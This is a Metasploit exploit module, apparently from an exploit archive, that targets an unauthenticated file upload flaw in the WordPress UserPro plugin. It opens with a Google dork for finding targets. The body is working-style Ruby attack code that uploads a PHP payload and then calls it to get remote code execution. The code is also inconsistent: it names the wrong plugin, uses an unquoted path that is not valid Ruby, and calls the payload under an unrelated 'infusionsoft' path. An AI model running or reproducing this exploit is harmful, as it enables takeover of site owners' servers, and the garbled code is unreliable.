# Exploit Title : Wordpress Userpro Remote File Upload # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://userproplugin.com/ # Google Dork : inurl:/wp-content/plugins/userpro/ # Date : 10/20/2016 # Tested on : Windows10/Linux # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress Userpro unauthorization Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the wordpress Ifileupload plugin, The vulnerability allows for unauthorization file upload and remote code execution. }, 'Author' => [ 'T3rm!nat0r5', 'termijan <poyaterminator@gmail.com>' ], 'License' => MSF_LICENSE, 'References' => [ ['Ref', 'http://priv8.termijan/'], ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['userpro', {}]], 'DisclosureDate' => 'Oct 20 2016', 'DefaultTarget' => 0) ) end def check res = send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'userpro', 'userpro', 'lib', 'fileupload','fileupload.php') ) if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /userpro/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit php_pagename = rand_text_alpha(8 + rand(8)) + '.php' res = send_request_cgi({ 'uri' => normalize_uri(wp-content, 'plugins', 'userpro', 'lib', 'fileupload' , 'fileupload.php'), 'method' => 'POST', 'vars_post' => { 'fileNamePattern' => php_pagename, 'fileTemplate' => payload.encoded } }) if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/ print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with("#{peer} - Unable deploy payload, server returned #{res.code}") end print_status("#{peer} - Calling payload ...") send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', php_pagename) }, 2) end end # Exploit by T3rm!nat0r5